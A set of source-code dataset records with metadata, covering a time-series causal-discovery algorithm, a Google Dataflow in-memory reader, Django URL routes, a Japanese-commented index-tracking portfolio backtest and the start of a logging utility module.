list_num_adj)\n print(p_list, q_list)\n print(\"set_size \" +str(set_size))\n # res = Parallel(n_jobs=self.num_processor)(delayed(self._cmi_sep_set_pq)(p, q, set_size) for p, q in\n # zip(p_list, q_list))\n res = []\n for p, q in zip(p_list, q_list):\n res.append(self._cmi_sep_set_pq(p, q, set_size))\n\n ranks = RankingList()\n for pq in range(len(res)):\n if res[pq] is not None:\n if isinstance(res[pq][2], list):\n for r in range(len(res[pq][2])):\n ranks.add(res[pq][0], res[pq][1], res[pq][2][r], res[pq][3][r])\n else:\n ranks.add(res[pq][0], res[pq][1], res[pq][2], res[pq][3])\n if self.rank_using_p_value:\n ranks.sort(descending=True)\n else:\n ranks.sort(descending=False)\n return ranks\n\n def find_sep_set(self):\n \"\"\"\n find the most contributing separation set (if it exists) between each pair of time series\n \"\"\"\n if self.verbose:\n print(\"######################################\")\n print(\"Skeletion Speperation\")\n print(\"######################################\")\n\n print(\"max set size = \" + str(self.graph.d-1))\n for set_size in range(1, self.graph.d-1):\n ranks = self.rank_cmi_sep_set_parallel(set_size)\n if self.verbose:\n print(\"Ranking:\")\n print(\"p: \"+str(ranks.elem_p))\n print(\"p: \" + str(ranks.elem_q))\n print(\"p: \" + str(ranks.elem_r))\n print(\"p: \" + str(ranks.val))\n for p, q, r_set, cmi in zip(ranks.elem_p, ranks.elem_q, ranks.elem_r, ranks.val):\n test = (self.graph.edges[p, q] != 0)\n for r in r_set:\n if not test:\n break\n test = test and ((self.graph.edges[q, r] != 0) or (self.graph.edges[p, r] != 0))\n # test = test and ((self.graph.sep[p, r, q] == 0) and (self.graph.sep[q, r, p] == 0))\n if test:\n mi = self.mi_array[p, q]\n\n if self.p_value != self.rank_using_p_value:\n if self.adaptive_window:\n x = window_representation(self.series[self.names[p]],\n windows_size=self.window_matrix[self.names[p]].loc[self.names[p]])\n y = window_representation(self.series[self.names[q]],\n windows_size=self.window_matrix[self.names[q]].loc[self.names[q]])\n else:\n x = self.data_dict[self.names[p]]\n y = self.data_dict[self.names[q]]\n\n z = dict()\n for r in r_set:\n if self.adaptive_window:\n # select and drop NA\n z[self.names[r]] = self.series[self.names[r]].dropna()\n else:\n z[self.names[r]] = self.data_dict[self.names[r]]\n if self.graphical_optimization:\n # cmi, _ = gctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n # gamma_matrix=self.gamma_matrix, p_value=self.p_value, graph=self.graph.edges)\n cmi_pval, cmi_val = ctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n gamma_matrix=self.gamma_matrix, graph=self.graph.edges,\n p_value=self.rank_using_p_value,\n instantaneous_dict=self.instantaneous_dict)\n else:\n cmi, _ = ctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n gamma_matrix=self.gamma_matrix, p_value=self.p_value,\n instantaneous_dict=self.instantaneous_dict)\n if self.verbose:\n print(\"p=\" + str(p) + \"; q=\" + str(q) + \"; r=\" + str(r_set) + \"; I(p,q|r)=\" + \"{: 0.5f}\".format(\n cmi) + \"; I(p,q)=\" + \"{: 0.5f}\".format(mi), end=\" \")\n\n if self.p_value:\n test = mi < self.sig_lev < cmi\n else:\n test = cmi < self.alpha\n if test:\n self.cmi_array[p, q] = cmi\n self.cmi_array[q, p] = cmi\n if self.verbose:\n print(\"=> remove link between \" + str(p) + \" and \" + str(q))\n self.graph.edges[p, q] = 0\n self.graph.edges[q, p] = 0\n\n for r in r_set:\n self.graph.add_sep(q, p, r)\n self.biggamma[p,q,r] = self.gamma_matrix[self.names[p]].loc[self.names[r]]\n self.biggamma[q,p,r] = self.gamma_matrix[self.names[q]].loc[self.names[r]]\n else:\n if self.verbose:\n print()\n # self._exclude_past()\n\n def fit2(self):\n \"\"\"\n run PCTMI\n :return: graph (CPDAG)\n \"\"\"\n if self.verbose:\n now = datetime.now()\n print(\"#######################################\")\n print(\"########### Starting KITMI ###########\")\n print(\"########### \" + now.strftime(\"%H:%M:%S\" + \" ###########\"))\n print(\"#######################################\")\n\n # initialize skeleton\n self.skeleton_initialize()\n\n # get separation sets\n self.find_sep_set()\n\n if self.verbose:\n print(\"######################################\")\n print(\"Final Results (KITMI)\")\n print(\"######################################\")\n print(\"Summary Graph:\")\n print(self.graph.edges)\n return self.graph.edges\n\n\nif __name__ == \"__main__\":\n from data.sim_data import generate_v_structure, generate_fork, diamond_generator, generate_mediator, mooij_7ts\n\n # data = generate_v_structure(2000)\n data = generate_fork(1000)\n # data, _, _ = diamond_generator(2000)\n # data.drop([data.columns[1]], axis=1, inplace=True)\n\n lag = 5\n # d = len(data.columns)\n\n n_iters = 1000\n hidden_size = 25 # d*(order-1)*2\n learning_rate = 0.01\n # input_size = 3\n\n # res = tskiko_mv(data, lag, learning_rate, n_iters, noise=True, alpha=0.05)\n res = nbcb_k(data, lag, learning_rate, n_iters, noise=True, alpha=0.05)\n print(res)\n # print(res['discovery'])\n\n # x = mts_order(data, order=order) #[:-order]\n # print(x.loc[2:5])\n # # y = mts_order(data[order+1:], order=order)\n # names_x = x.columns[:-d]\n # names_y = x.columns[-d:]\n # y = x[names_y]\n # x = x[names_x]\n # print(x.shape)\n # print(y.shape)\n", "sub_path": "baselines/scripts_python/python_packages/pwNBCBk/kitmi.py", "file_name": "kitmi.py", "file_ext": "py", "file_size_in_byte": 56359, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.device", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 27, "usage_type": "attribute"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.tigramite.tigramite.independence_tests.CMIknn", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.tigramite.tigramite.independence_tests.ParCorr", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 97, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 97, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 114, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 115, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 132, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 182, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 184, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 193, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 199, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 201, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 228, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 268, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 268, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 270, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 270, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 274, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 284, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 288, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 289, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 295, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 296, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 327, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 328, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 355, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 355, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 357, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 357, "usage_type": "call"}, {"api_name": "time.time", "line_number": 389, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 395, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 395, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 415, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 415, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 417, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 425, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 425, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 431, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 431, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 432, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 432, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 434, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 434, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 435, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 435, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 442, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 442, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 443, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 443, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 445, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 445, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 457, "usage_type": "call"}, {"api_name": "time.time", "line_number": 481, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 512, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 512, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 514, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 514, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 518, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 524, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 528, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 529, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 532, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 533, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 569, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 572, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 572, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 576, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 576, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 600, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 600, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 602, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 602, "usage_type": "call"}, {"api_name": "time.time", "line_number": 633, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 639, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 639, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 667, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 668, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 692, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 693, "usage_type": "call"}, {"api_name": "numpy.intersect1d", "line_number": 694, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 715, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 716, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 717, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 727, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 728, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 729, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 736, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 738, "usage_type": "call"}, {"api_name": "numpy.take_along_axis", "line_number": 743, "usage_type": "call"}, {"api_name": "numpy.take_along_axis", "line_number": 744, "usage_type": "call"}, {"api_name": "numpy.take_along_axis", "line_number": 745, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.get_sampling_rate", "line_number": 810, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.get_alpha", "line_number": 813, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 819, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.align_matrix", "line_number": 826, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 828, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 830, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 831, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 856, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 860, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 863, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 894, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 894, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 905, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 906, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 921, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 998, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1021, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1058, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 1060, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 1139, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1139, "usage_type": "name"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1165, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1166, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.tmi", "line_number": 1174, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1191, "usage_type": "call"}, {"api_name": "numpy.triu", "line_number": 1191, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 1191, "usage_type": "call"}, {"api_name": "numpy.triu", "line_number": 1193, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 1193, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 1195, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 1195, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 1229, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1241, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1242, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.ctmi", "line_number": 1259, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.ctmi", "line_number": 1263, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1349, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1351, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.ctmi", "line_number": 1367, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.ctmi", "line_number": 1372, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 1406, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1406, "usage_type": "name"}, {"api_name": "data.sim_data", "line_number": 1431, "usage_type": "name"}, {"api_name": "data.sim_data.generate_fork", "line_number": 1431, "usage_type": "call"}, {"api_name": "data.sim_data", "line_number": 1444, "usage_type": "argument"}]} +{"seq_id": "461396696", "text": "# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"In-memory input source.\"\"\"\n\nimport itertools\n\nfrom google.cloud.dataflow import coders\nfrom google.cloud.dataflow.io import iobase\n\n\nclass InMemorySource(iobase.NativeSource):\n \"\"\"In-memory input source.\"\"\"\n\n def __init__(\n self, elements, coder=coders.Base64PickleCoder(), start_index=None,\n end_index=None):\n self.elements = elements\n self.coder = coder\n\n if start_index is None:\n self.start_index = 0\n else:\n self.start_index = start_index\n\n if end_index is None:\n self.end_index = len(elements)\n else:\n self.end_index = end_index\n\n def __eq__(self, other):\n return (self.elements == other.elements and\n self.coder == other.coder and\n self.start_index == other.start_index and\n self.end_index == other.end_index)\n\n def reader(self):\n return InMemoryReader(self)\n\n\nclass InMemoryReader(iobase.NativeSourceReader):\n \"\"\"A reader for in-memory source.\"\"\"\n\n def __init__(self, source):\n self.source = source\n\n # Index of the next item to be read by the InMemoryReader.\n # Starts at source.start_index.\n self.current_index = source.start_index\n\n def __enter__(self):\n return self\n\n def __exit__(self, exception_type, exception_value, traceback):\n pass\n\n def __iter__(self):\n for value in itertools.islice(self.source.elements,\n self.source.start_index,\n self.source.end_index):\n self.current_index += 1\n yield self.source.coder.decode(value)\n\n def get_progress(self):\n if (self.current_index >= self.source.end_index or\n self.source.start_index >= self.source.end_index):\n percent_complete = 1\n elif self.current_index == self.source.start_index:\n percent_complete = 0\n else:\n percent_complete = (\n float(self.current_index - self.source.start_index) / (\n self.source.end_index - self.source.start_index))\n\n return iobase.ReaderProgress(percent_complete=percent_complete)\n", "sub_path": "google/cloud/dataflow/worker/inmemory.py", "file_name": "inmemory.py", "file_ext": "py", "file_size_in_byte": 2620, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "google.cloud.dataflow.io.iobase.NativeSource", "line_number": 23, "usage_type": "attribute"}, {"api_name": "google.cloud.dataflow.io.iobase", "line_number": 23, "usage_type": "name"}, {"api_name": "google.cloud.dataflow.coders.Base64PickleCoder", "line_number": 27, "usage_type": "call"}, {"api_name": "google.cloud.dataflow.coders", "line_number": 27, "usage_type": "name"}, {"api_name": "google.cloud.dataflow.io.iobase.NativeSourceReader", "line_number": 52, "usage_type": "attribute"}, {"api_name": "google.cloud.dataflow.io.iobase", "line_number": 52, "usage_type": "name"}, {"api_name": "itertools.islice", "line_number": 69, "usage_type": "call"}, {"api_name": "google.cloud.dataflow.io.iobase.ReaderProgress", "line_number": 86, "usage_type": "call"}, {"api_name": "google.cloud.dataflow.io.iobase", "line_number": 86, "usage_type": "name"}]} +{"seq_id": "317494085", "text": "from django.conf.urls import url\n\nfrom . import views\n\napp_name = 'account'\nurlpatterns = [\n url(r'^$', views.show, name='show'),\n url(r'^save/$', views.save_list, name='save_list'),\n url(r'^import/$', views.import_page, name='import_page'),\n url(r'^import/submit$', views.import_csv, name='import_csv'),\n url(r'^export/$', views.export_csv, name='export_csv'),\n url(r'^customize/$', views.custom, name='customize'),\n url(r'^customize/(?P[0-9]+)/edit/$', views.edit, name='edit'),\n url(r'^customize/(?P[0-9]+)/edit/save$', views.edit_save, name='edit_save'),\n url(r'^customize/(?P[0-9]+)/remove/$', views.remove, name='remove'),\n url(r'^customize/(?P[0-9]+)/remove/confirm$', views.remove_confirm, name='remove_confirm'),\n] \n", "sub_path": "urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 795, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "4928489", "text": "# -*- coding: utf-8 -*-\n#%% NumPyの読み込み\nimport numpy as np\n# SciPyのstatsモジュールの読み込み\nimport scipy.stats as st\n# CVXPYの読み込み\nimport cvxpy as cvx\n# Pandasの読み込み\nimport pandas as pd\n# MatplotlibのPyplotモジュールの読み込み\nimport matplotlib.pyplot as plt\n# 日本語フォントの設定\nfrom matplotlib.font_manager import FontProperties\nimport sys\nif sys.platform.startswith('win'):\n FontPath = 'C:\\\\Windows\\\\Fonts\\\\meiryo.ttc'\nelif sys.platform.startswith('darwin'):\n FontPath = '/System/Library/Fonts/ヒラギノ角ゴシック W4.ttc'\nelif sys.platform.startswith('linux'):\n FontPath = '/usr/share/fonts/truetype/takao-gothic/TakaoPGothic.ttf'\njpfont = FontProperties(fname=FontPath)\n#%% 収益率データの読み込みとベンチマークの生成\nR = pd.read_csv('asset_return_data.csv', index_col=0)\n# R = R.asfreq(pd.infer_freq(R.index)) # この行は無視する\nT = R.shape[0]\nN = R.shape[1]\nnp.random.seed(8888)\nBenchmarkIndex = R.dot(np.tile(1.0/N, N)) + st.norm(0.0, 3.0).rvs(T)\n#%% トラッキングエラー最小化問題のバックテスト\nMovingWindow = 96\nBackTesting = T - MovingWindow\nV_Tracking = np.zeros(BackTesting)\nWeight = cvx.Variable(N)\nError = cvx.Variable(MovingWindow)\nTrackingError = cvx.sum_squares(Error)\nAsset_srT = R / np.sqrt(MovingWindow)\nIndex_srT = BenchmarkIndex / np.sqrt(MovingWindow)\nfor Month in range(0, BackTesting):\n Asset = Asset_srT.values[Month:(Month + MovingWindow), :]\n Index = Index_srT.values[Month:(Month + MovingWindow)]\n Min_TrackingError = cvx.Problem(cvx.Minimize(TrackingError),\n [Index - Asset @ Weight == Error,\n cvx.sum(Weight) == 1.0,\n Weight >= 0.0])\n Min_TrackingError.solve(solver=cvx.ECOS)\n V_Tracking[Month] = R.values[Month + MovingWindow, :].dot(Weight.value)\n#%% バックテストの結果のグラフ\nfig1 = plt.figure(1, facecolor='w')\nplt.plot(list(range(1, BackTesting + 1)), BenchmarkIndex[MovingWindow:], 'k-')\nplt.plot(list(range(1, BackTesting + 1)), V_Tracking, 'k--')\nplt.legend([u'ベンチマーク・インデックス', u'インデックス・ファンド'],\n loc='best', frameon=False, prop=jpfont)\nplt.xlabel(u'運用期間(年)', fontproperties=jpfont)\nplt.ylabel(u'収益率(%)', fontproperties=jpfont)\nplt.xticks(list(range(12, BackTesting + 1, 12)),\n pd.date_range(R.index[MovingWindow], periods=BackTesting//12,\n freq='AS').year)\nplt.show()\n", "sub_path": "python/pyfin_min_tracking_error_ver1_1.py", "file_name": "pyfin_min_tracking_error_ver1_1.py", "file_ext": "py", "file_size_in_byte": 2589, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.platform.startswith", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.platform.startswith", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.platform.startswith", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 19, "usage_type": "attribute"}, {"api_name": "matplotlib.font_manager.FontProperties", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.tile", "line_number": 28, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 28, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 28, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "cvxpy.Variable", "line_number": 33, "usage_type": "call"}, {"api_name": "cvxpy.Variable", "line_number": 34, "usage_type": "call"}, {"api_name": "cvxpy.sum_squares", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 37, "usage_type": "call"}, {"api_name": "cvxpy.Problem", "line_number": 41, "usage_type": "call"}, {"api_name": "cvxpy.Minimize", "line_number": 41, "usage_type": "call"}, {"api_name": "cvxpy.sum", "line_number": 43, "usage_type": "call"}, {"api_name": "cvxpy.ECOS", "line_number": 45, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "pandas.date_range", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}]} +{"seq_id": "9320961", "text": "\"\"\"\nUnicorn core.logutils module\nUnicorn module which provides common logging functions. \nIn order to initialize logger function init_logger should be used.\n\"\"\"\n\nimport sys\nimport os\nimport logging\nimport copy\nimport shutil\nimport re\nfrom datetime import datetime\nfrom threading import Lock\n\ntry:\n from core import logutils_conversions\n from core import environment_preparation\nexcept ImportError:\n import logutils_conversions\n import environment_preparation\n\ntry:\n import colorama\nexcept ImportError as e:\n colorama = None\nelse:\n colorama.init() \n\nloglock = Lock()\n \n# PATCHING CUSTOM LEVELS\nlogging.H1 = 99\nlogging.H2 = 98\nlogging.H3 = 97\nlogging.PLAIN = 29\nlogging.FRAME = 28\nlogging.TABLE = 27\nlogging.VERBOSE = 21\n\nlevel_styles = {}\nmessage_styles = {}\n\n\n\n# ==============================================================================\nclass EnhancedLogger(logging.getLoggerClass()):\n \"\"\"\n Logger class with additional methods / log levels.\n \"\"\"\n def __init__(self, name, level = logging.NOTSET):\n super().__init__(name, level)\n logging.addLevelName(logging.H1, \"H1\")\n logging.addLevelName(logging.H2, \"H2\")\n logging.addLevelName(logging.H3, \"H3\")\n logging.addLevelName(logging.TABLE, \"TABLE\")\n logging.addLevelName(logging.FRAME, \"FRAME\")\n logging.addLevelName(logging.PLAIN, \"PLAIN\")\n logging.addLevelName(logging.VERBOSE, \"VERBOSE\")\n \n def h1(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.H1):\n msg = logutils_conversions._string_to_h1(msg)\n self._log(logging.H1, msg, args, **kwargs)\n \n def h2(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.H2):\n msg = logutils_conversions._string_to_h2(msg)\n self._log(logging.H2, msg, args, **kwargs)\n \n def h3(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.H3):\n msg = logutils_conversions._string_to_h3(msg)\n 